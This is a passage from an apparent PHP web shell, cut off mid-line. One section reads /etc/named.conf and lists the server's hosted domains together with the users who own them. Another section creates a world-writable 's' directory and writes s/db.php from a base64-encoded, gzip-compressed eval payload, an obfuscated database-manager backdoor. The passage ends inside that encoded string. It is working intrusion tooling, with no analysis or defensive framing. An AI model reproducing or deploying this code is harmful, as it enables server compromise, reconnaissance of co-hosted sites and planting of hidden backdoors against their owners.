1784. <?php
1785. if (isset($_GET['idb']) && ($_GET['idb'] == 'domain')) { ?>
1786. <form action="?idb=domain" method="post">
1787.  
1788. <?php
1789. echo '<br><br></center><br><br><div class=content>';
1790. $file = @implode(@file("/etc/named.conf"));
1791. if (!$file) {
1792. die("can't ReaD -> [ /etc/named.conf ");
1793. }
1794. preg_match_all("#named/(.*?).db#", $file, $r);
1795. $domains = array_unique($r[1]);
1796. //check();
1797. //if(isset($_GET['ShowAll']))
1798. {
1799. echo "<table align=center border=1 width=59% cellpadding=5>
1800. <tr><td colspan=2>[+] ADA [ <b>" . count($domains) . "</b> ] DOMAIN</td></tr>
1801. <tr><td>Domain</td><td>User</td></tr>";
1802. foreach ($domains as $domain) {
1803. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
1804. echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
1805. }
1806. echo "</table>";
1807. }
1808. echo '</div>';
1809. }
1810. ?>
1811. <?php
1812. if (isset($_GET['idb']) && ($_GET['idb'] == 'sql')) {
1813. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
1814. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
1815. if (!is_dir('s')) {
1816. $mk = @mkdir('s', 0777);
1817. @fwrite($f, $c);
1818. $f2 = @fopen('s/db.php', 'w');
1819. $sml_db = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXblueGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3blueaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL